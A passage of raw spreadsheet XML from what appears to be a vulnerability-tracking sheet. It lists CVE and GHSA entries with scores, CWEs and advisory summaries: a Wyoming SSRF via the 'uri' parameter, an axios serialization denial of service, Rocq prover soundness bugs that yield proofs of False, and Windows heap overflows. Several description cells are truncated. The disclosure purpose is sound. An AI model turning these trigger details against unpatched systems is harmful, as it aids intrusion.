t="n"><v>6.9</v></c><c r="E1529" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1529" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1529" s="5" t="inlineStr" /><c r="H1529" s="5" t="n"><v>0.007</v></c><c r="I1529" s="5" t="inlineStr" /><c r="J1529" s="5" t="inlineStr" /><c r="K1529" s="5" t="inlineStr" /><c r="L1529" s="5" t="inlineStr" /><c r="M1529" s="5" t="inlineStr" /><c r="N1529" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1529" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1529" s="5" t="inlineStr" /><c r="Q1529" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R1529" s="5" t="inlineStr"><is><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is></c><c r="S1529" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86810</t></is></c></row><row r="1530"><c r="A1530" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1530" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1530" s="5" t="inlineStr"><is><t>CVE-2026-8712</t></is></c><c r="D1530" s="5" t="n"><v>6.9</v></c><c r="E1530" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1530" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1530" s="5" t="inlineStr" /><c r="H1530" s="5" t="n"><v>0.002</v></c><c r="I1530" s="5" t="inlineStr" /><c r="J1530" s="5" t="inlineStr" /><c r="K1530" s="5" t="inlineStr" /><c r="L1530" s="5" t="inlineStr" /><c r="M1530" s="5" t="inlineStr" /><c r="N1530" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1530" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1530" s="5" t="inlineStr" /><c r="Q1530" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1530" s="5" t="inlineStr"><is><t>Wyoming before 1.10.2 contains a server-side request forgery vulnerability that allows unauthenticated attackers with network access to force outbound connections to arbitrary targets by supplying a malicious `uri` query parameter to the HTTP API. Attackers can pass arbitrary `tcp://` or `unix://` URIs to affected endpoints including /api/info, /api/speech-to-text, and /api/text-to-speech to override the server-configured backend and redirect connections to attacker-chosen hosts.</t></is></c><c r="S1530" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-8712</t></is></c></row><row r="1531"><c r="A1531" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1531" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1531" s="5" t="inlineStr"><is><t>GHSA-3mcp-22mf-vrw3</t></is></c><c r="D1531" s="5" t="n"><v>6.9</v></c><c r="E1531" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1531" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1531" s="5" t="inlineStr" /><c r="H1531" s="5" t="inlineStr" /><c r="I1531" s="5" t="inlineStr" /><c r="J1531" s="5" t="inlineStr" /><c r="K1531" s="5" t="inlineStr" /><c r="L1531" s="5" t="inlineStr"><is><t>npm:axios</t></is></c><c r="M1531" s="5" t="inlineStr" /><c r="N1531" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1531" s="5" t="inlineStr" /><c r="P1531" s="5" t="inlineStr" /><c r="Q1531" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="R1531" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-hcpx-6fm6-wx23. This link is maintained to preserve external references.

## Original Description
axios before 0.33.0 contains an incomplete depth-limit bypass in toFormData.js when serializing objects with top-level keys ending in '{}'. Attackers who control object keys and nested values passed to axios form or parameter serialization can trigger a RangeError from JSON.stringify, causing denial of service in the affected request path.</t></is></c><c r="S1531" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-3mcp-22mf-vrw3</t></is></c></row><row r="1532"><c r="A1532" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1532" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1532" s="5" t="inlineStr"><is><t>GHSA-mxjf-vfmv-qfm6</t></is></c><c r="D1532" s="5" t="n"><v>6.9</v></c><c r="E1532" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1532" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1532" s="5" t="inlineStr" /><c r="H1532" s="5" t="inlineStr" /><c r="I1532" s="5" t="inlineStr" /><c r="J1532" s="5" t="inlineStr" /><c r="K1532" s="5" t="inlineStr" /><c r="L1532" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1532" s="5" t="inlineStr" /><c r="N1532" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1532" s="5" t="inlineStr" /><c r="P1532" s="5" t="inlineStr" /><c r="Q1532" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1532" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-74pj-6g7r-j55c. This link is maintained to preserve external references.

## Original Description
SiYuan before v3.7.4 contains an information disclosure vulnerability in the /api/notebook/getNotebookInfo endpoint that returns notebook metadata without authorization checks. Attackers can read notebook names, document counts, sizes, and timestamps for closed or non-published notebooks that should be hidden from readers.</t></is></c><c r="S1532" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-mxjf-vfmv-qfm6</t></is></c></row><row r="1533"><c r="A1533" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1533" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1533" s="5" t="inlineStr"><is><t>CVE-2020-37268</t></is></c><c r="D1533" s="5" t="n"><v>6.8</v></c><c r="E1533" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1533" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1533" s="5" t="inlineStr" /><c r="H1533" s="5" t="n"><v>0.001</v></c><c r="I1533" s="5" t="inlineStr" /><c r="J1533" s="5" t="inlineStr" /><c r="K1533" s="5" t="inlineStr" /><c r="L1533" s="5" t="inlineStr" /><c r="M1533" s="5" t="inlineStr" /><c r="N1533" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1533" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1533" s="5" t="inlineStr" /><c r="Q1533" s="5" t="inlineStr"><is><t>CWE-778</t></is></c><c r="R1533" s="5" t="inlineStr"><is><t>Print Assumptions does not report that a definition was produced while universe checking was disabled when that definition reaches the caller through Parameter Inline in a module type. Applying a functor inlines the body of the parameter, and the inlining drops the record that the term was built under Unset Universe Checking, so the resulting constant carries no trace of the unsafe operation. A module implementation can therefore prove False using a universe inconsistency, expose it through an inlined parameter, and have Print Assumptions report the dependent proof as closed under the global context. Because Print Assumptions is the in-process audit used to confirm that a development rests on no unexpected assumptions, a dependency built this way passes that audit while proving arbitrary propositions. The standalone checker coqchk does reject the resulting compiled file. The project records this in dev/doc/critical-bugs.md under non-fixed bugs and rates the risk as moderate when coqchk is not used.</t></is></c><c r="S1533" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2020-37268</t></is></c></row><row r="1534"><c r="A1534" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1534" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1534" s="5" t="inlineStr"><is><t>CVE-2025-15647</t></is></c><c r="D1534" s="5" t="n"><v>6.8</v></c><c r="E1534" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1534" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1534" s="5" t="inlineStr" /><c r="H1534" s="5" t="n"><v>0.001</v></c><c r="I1534" s="5" t="inlineStr" /><c r="J1534" s="5" t="inlineStr" /><c r="K1534" s="5" t="inlineStr" /><c r="L1534" s="5" t="inlineStr" /><c r="M1534" s="5" t="inlineStr" /><c r="N1534" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1534" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1534" s="5" t="inlineStr" /><c r="Q1534" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1534" s="5" t="inlineStr"><is><t>CDT before 1.4.5 contains an out-of-bounds read vulnerability in the opposedVertexInd() function when constraint edge intersections are computed in floating point and round outside adjacent triangles. Attackers can supply nearly-degenerate constraint edges through geometry data to trigger an out-of-bounds array access that crashes the calling process.</t></is></c><c r="S1534" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-15647</t></is></c></row><row r="1535"><c r="A1535" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1535" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1535" s="5" t="inlineStr"><is><t>CVE-2026-62383</t></is></c><c r="D1535" s="5" t="n"><v>6.8</v></c><c r="E1535" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1535" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1535" s="5" t="inlineStr" /><c r="H1535" s="5" t="n"><v>0.002</v></c><c r="I1535" s="5" t="inlineStr" /><c r="J1535" s="5" t="inlineStr" /><c r="K1535" s="5" t="inlineStr" /><c r="L1535" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M1535" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N1535" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O1535" s="5" t="inlineStr" /><c r="P1535" s="5" t="inlineStr" /><c r="Q1535" s="5" t="inlineStr"><is><t>CWE-22, CWE-59</t></is></c><c r="R1535"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S1535" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62383</t></is></c></row><row r="1536"><c r="A1536" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1536" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1536" s="5" t="inlineStr"><is><t>CVE-2026-65812</t></is></c><c r="D1536" s="5" t="n"><v>6.8</v></c><c r="E1536" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1536" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1536" s="5" t="inlineStr" /><c r="H1536" s="5" t="n"><v>0.005</v></c><c r="I1536" s="5" t="inlineStr" /><c r="J1536" s="5" t="inlineStr" /><c r="K1536" s="5" t="inlineStr" /><c r="L1536" s="5" t="inlineStr" /><c r="M1536" s="5" t="inlineStr" /><c r="N1536" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1536" s="5" t="inlineStr" /><c r="Q1536" s="5" t="inlineStr"><is><t>CWE-201</t></is></c><c r="R1536" s="5" t="inlineStr"><is><t>Insertion of sensitive information into sent data in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1536" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65812</t></is></c></row><row r="1537"><c r="A1537" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1537" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1537" s="5" t="inlineStr"><is><t>CVE-2026-68833</t></is></c><c r="D1537" s="5" t="n"><v>6.8</v></c><c r="E1537" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1537" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1537" s="5" t="inlineStr" /><c r="H1537" s="5" t="n"><v>0.003</v></c><c r="I1537" s="5" t="inlineStr" /><c r="J1537" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K153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37" s="5" t="inlineStr" /><c r="M1537" s="5" t="inlineStr" /><c r="N1537" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1537" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1537" s="5" t="inlineStr" /><c r="Q1537" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1537" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S1537" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68833</t></is></c></row><row r="1538"><c r="A1538" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1538" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1538" s="5" t="inlineStr"><is><t>CVE-2026-69415</t></is></c><c r="D1538" s="5" t="n"><v>6.8</v></c><c r="E1538" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1538" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1538" s="5" t="inlineStr" /><c r="H1538" s="5" t="n"><v>0.007</v></c><c r="I1538" s="5" t="inlineStr" /><c r="J1538" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1538" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1538" s="5" t="inlineStr" /><c r="M1538" s="5" t="inlineStr" /><c r="N1538" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1538" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1538" s="5" t="inlineStr" /><c r="Q1538" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R1538" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows DHCP Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1538" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69415</t></is></c></row><row r="1539"><c r="A1539" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1539" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1539" s="5" t="inlineStr"><is><t>CVE-2026-69490</t></is></c><c r="D1539" s="5" t="n"><v>6.8</v></c><c r="E1539" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1539" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1539" s="5" t="inlineStr" /><c r="H1539" s="5" t="n"><v>0.004</v></c><c r="I1539" s="5" t="inlineStr" /><c r="J1539" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K153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39" s="5" t="inlineStr" /><c r="M1539" s="5" t="inlineStr" /><c r="N1539" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1539" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1539" s="5" t="inlineStr" /><c r="Q1539" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1539" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="S1539" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69490</t></is></c></row><row r="1540"><c r="A1540" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1540" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1540" s="5" t="inlineStr"><is><t>CVE-2026-69566</t></is></c><c r="D1540" s="5" t="n"><v>6.8</v></c><c r="E1540" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1540" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1540" s="5" t="inlineStr" /><c r="H1540" s="5" t="n"><v>0.004</v></c><c r="I1540" s="5" t="inlineStr" /><c r="J1540" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K154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40" s="5" t="inlineStr" /><c r="M1540" s="5" t="inlineStr" /><c r="N1540" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1540" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1540" s="5" t="inlineStr" /><c r="Q1540" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1540" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S1540" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69566</t></is></c></row><row r="1541"><c r="A1541" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1541" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1541" s="5" t="inlineStr"><is><t>CVE-2026-71329</t></is></c><c r="D1541" s="5" t="n"><v>6.8</v></c><c r="E1541" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1541" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1541" s="5" t="inlineStr" /><c r="H1541" s="5" t="n"><v>0.003</v></c><c r="I1541" s="5" t="inlineStr" /><c r="J1541" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1541"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41" s="5" t="inlineStr" /><c r="M1541" s="5" t="inlineStr" /><c r="N1541" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1541" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1541" s="5" t="inlineStr" /><c r="Q1541" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1541" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S1541" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71329</t></is></c></row><row r="1542"><c r="A1542" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1542" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1542" s="5" t="inlineStr"><is><t>CVE-2026-71348</t></is></c><c r="D1542" s="5" t="n"><v>6.8</v></c><c r="E1542" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1542" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1542" s="5" t="inlineStr" /><c r="H1542" s="5" t="n"><v>0.004</v></c><c r="I1542" s="5" t="inlineStr" /><c r="J1542" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K154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42" s="5" t="inlineStr" /><c r="M1542" s="5" t="inlineStr" /><c r="N1542" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1542" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1542" s="5" t="inlineStr" /><c r="Q1542" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1542" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="S1542" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71348</t></is></c></row><row r="1543"><c r="A1543" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1543" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1543" s="5" t="inlineStr"><is><t>CVE-2026-71349</t></is></c><c r="D1543" s="5" t="n"><v>6.8</v></c><c r="E1543" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1543" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1543" s="5" t="inlineStr" /><c r="H1543" s="5" t="n"><v>0.004</v></c><c r="I1543" s="5" t="inlineStr" /><c r="J1543" s="5" t="inlineStr" /><c r="K1543" s="5" t="inlineStr" /><c r="L1543" s="5" t="inlineStr" /><c r="M1543" s="5" t="inlineStr" /><c r="N1543" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1543" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1543" s="5" t="inlineStr" /><c r="Q1543" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1543" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="S1543" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71349</t></is></c></row><row r="1544"><c r="A1544" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1544" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1544" s="5" t="inlineStr"><is><t>CVE-2026-71350</t></is></c><c r="D1544" s="5" t="n"><v>6.8</v></c><c r="E1544" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1544" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1544" s="5" t="inlineStr" /><c r="H1544" s="5" t="n"><v>0.004</v></c><c r="I1544" s="5" t="inlineStr" /><c r="J1544" s="5" t="inlineStr" /><c r="K1544" s="5" t="inlineStr" /><c r="L1544" s="5" t="inlineStr" /><c r="M1544" s="5" t="inlineStr" /><c r="N1544" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1544" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1544" s="5" t="inlineStr" /><c r="Q1544" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1544" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="S1544" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71350</t></is></c></row><row r="1545"><c r="A1545" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1545" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1545" s="5" t="inlineStr"><is><t>CVE-2026-72703</t></is></c><c r="D1545" s="5" t="n"><v>6.8</v></c><c r="E1545" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1545" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1545" s="5" t="inlineStr" /><c r="H1545" s="5" t="n"><v>0.001</v></c><c r="I1545" s="5" t="inlineStr" /><c r="J1545" s="5" t="inlineStr" /><c r="K1545" s="5" t="inlineStr" /><c r="L1545" s="5" t="inlineStr" /><c r="M1545" s="5" t="inlineStr" /><c r="N1545" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1545" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1545" s="5" t="inlineStr" /><c r="Q1545" s="5" t="inlineStr"><is><t>CWE-670</t></is></c><c r="R1545" s="5" t="inlineStr"><is><t>The guard checker in Rocq Prover treats a parameter of a nested mutual fixpoint as uniform without examining calls between the different bodies of that fixpoint. find_uniform_parameters in kernel/inductive.ml inspects only self-recursive calls, so when no body calls itself the function concludes that every parameter is uniform. A parameter that grows through a cross-call from one body to another therefore keeps the subterm specification it inherited from the enclosing fixpoint, and a recursive call guarded by that specification is accepted although the argument is not structurally smaller. A non-terminating definition is admitted as structurally decreasing, which yields a term whose value equals its own successor and so a proof of False, from which any proposition follows. The proof requires no axioms, plugins or unsafe flags and Print Assumptions reports it as closed under the global context. Introduced in Coq 8.20 and fixed in Rocq 9.2.0.</t></is></c><c r="S1545" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72703</t></is></c></row><row r="1546"><c r="A1546" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1546" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1546" s="5" t="inlineStr"><is><t>CVE-2026-72704</t></is></c><c r="D1546" s="5" t="n"><v>6.8</v></c><c r="E1546" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1546" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1546" s="5" t="inlineStr" /><c r="H1546" s="5" t="n"><v>0.001</v></c><c r="I1546" s="5" t="inlineStr" /><c r="J1546" s="5" t="inlineStr" /><c r="K1546" s="5" t="inlineStr" /><c r="L1546" s="5" t="inlineStr" /><c r="M1546" s="5" t="inlineStr" /><c r="N1546" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1546" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1546" s="5" t="inlineStr" /><c r="Q1546" s="5" t="inlineStr"><is><t>CWE-670</t></is></c><c r="R1546" s="5" t="inlineStr"><is><t>The guard checker in Rocq Prover does not recheck the recursive tree representation of an inductive type parameter after that parameter has been changed by transport. A fixpoint may apply a rewrite along an equality between types to its recursive argument, which the guard checker accepts because the inductive type is preserved, while the recursive tree recorded for the parameter is altered. A second fixpoint that calls the first inherits the altered recursive tree without verification, so a call that is not structurally decreasing is accepted as terminating. The resulting non-terminating definition proves that a natural number equals its own successor and therefore False, from which any proposition follows. The demonstration uses two axioms that follow from univalence and are consistent with the calculus of inductive constructions, so the contradiction comes from the guard check rather than from the assumptions. A fix is proposed but not merged.</t></is></c><c r="S1546" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72704</t></is></c></row><row r="1547"><c r="A1547" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1547" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1547" s="5" t="inlineStr"><is><t>CVE-2026-72705</t></is></c><c r="D1547" s="5" t="n"><v>6.8</v></c><c r="E1547" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1547" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1547" s="5" t="inlineStr" /><c r="H1547" s="5" t="n"><v>0.001</v></c><c r="I1547" s="5" t="inlineStr" /><c r="J1547" s="5" t="inlineStr" /><c r="K1547" s="5" t="inlineStr" /><c r="L1547" s="5" t="inlineStr" /><c r="M1547" s="5" t="inlineStr" /><c r="N1547" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1547" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1547" s="5" t="inlineStr" /><c r="Q1547" s="5" t="inlineStr"><is><t>CWE-670</t></is></c><c r="R1547" s="5" t="inlineStr"><is><t>The guard checker in Rocq Prover does not follow recursive calls made through a fixpoint's own arguments. A fixpoint may pass itself as a higher-order argument to a second fixpoint, which then applies it to a value that is not a subterm of the structural argument. Passing the recursive function to a plain definition is rejected because the checker unfolds the definition and observes the call, but passing it to a fixpoint is accepted because higher-order recursive calls through fixpoint arguments are not tracked. This admits a type that is definitionally equal to its own negation, so self-application produces False in purely definitional code, without tactics, axioms, plugins or unsafe flags, and Print Assumptions reports the result as closed under the global context. Fixed in Rocq 9.2.0.</t></is></c><c r="S1547" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72705</t></is></c></row><row r="1548"><c r="A1548" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1548" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1548" s="5" t="inlineStr"><is><t>CVE-2026-72714</t></is></c><c r="D1548" s="5" t="n"><v>6.8</v></c><c r="E1548" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1548" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1548" s="5" t="inlineStr" /><c r="H1548" s="5" t="n"><v>0.001</v></c><c r="I1548" s="5" t="inlineStr" /><c r="J1548" s="5" t="inlineStr" /><c r="K1548" s="5" t="inlineStr" /><c r="L1548" s="5" t="inlineStr" /><c r="M1548" s="5" t="inlineStr" /><c r="N1548" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1548" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1548" s="5" t="inlineStr" /><c r="Q1548" s="5" t="inlineStr"><is><t>CWE-459</t></is></c><c r="R1548" s="5" t="inlineStr"><is><t>Rocq Prover does not restore the universe graph's copy of the universe checking flag when a module that locally disabled the check is closed. Local Unset Universe Checking inside a module is expected to last only until the module ends, and the global flag is restored, but the universe graph keeps its own copy which is left disabled. The two views then disagree: Test Universe Checking reports the check as enabled while the kernel continues to accept universe-inconsistent terms. With the constraint between two universes no longer enforced, Hurkens' paradox applies and yields a proof of False, from which any proposition follows. The proof uses no axioms, plugins or unsafe features once the module has closed, and Print Assumptions reports it as closed under the global context, so neither the assumption audit nor the flag query reflects the actual kernel state. No fix is available.</t></is></c><c r="S1548" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72714</t></is></c></row><row r="1549"><c r="A1549" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1549" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1549" s="5" t="inlineStr"><is><t>CVE-2026-72985</t></is></c><c r="D1549" s="5" t="n"><v>6.8</v></c><c r="E1549" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1549" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1549" s="5" t="inlineStr" /><c r="H1549" s="5" t="n"><v>0.003</v></c><c r="I1549" s="5" t="inlineStr" /><c r="J1549" s="5" t="inlineStr" /><c r="K1549" s="5" t="inlineStr" /><c r="L1549" s="5" t="inlineStr" /><c r="M1549" s="5" t="inlineStr" /><c r="N1549" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1549" s="5" t="inlineStr" /><c r="Q1549" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1549" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Shadow Copy allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="S1549" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72985</t></is></c></row><row r="1550"><c r="A1550" s="5" t="inlineStr"><is><t>P4 - Low / 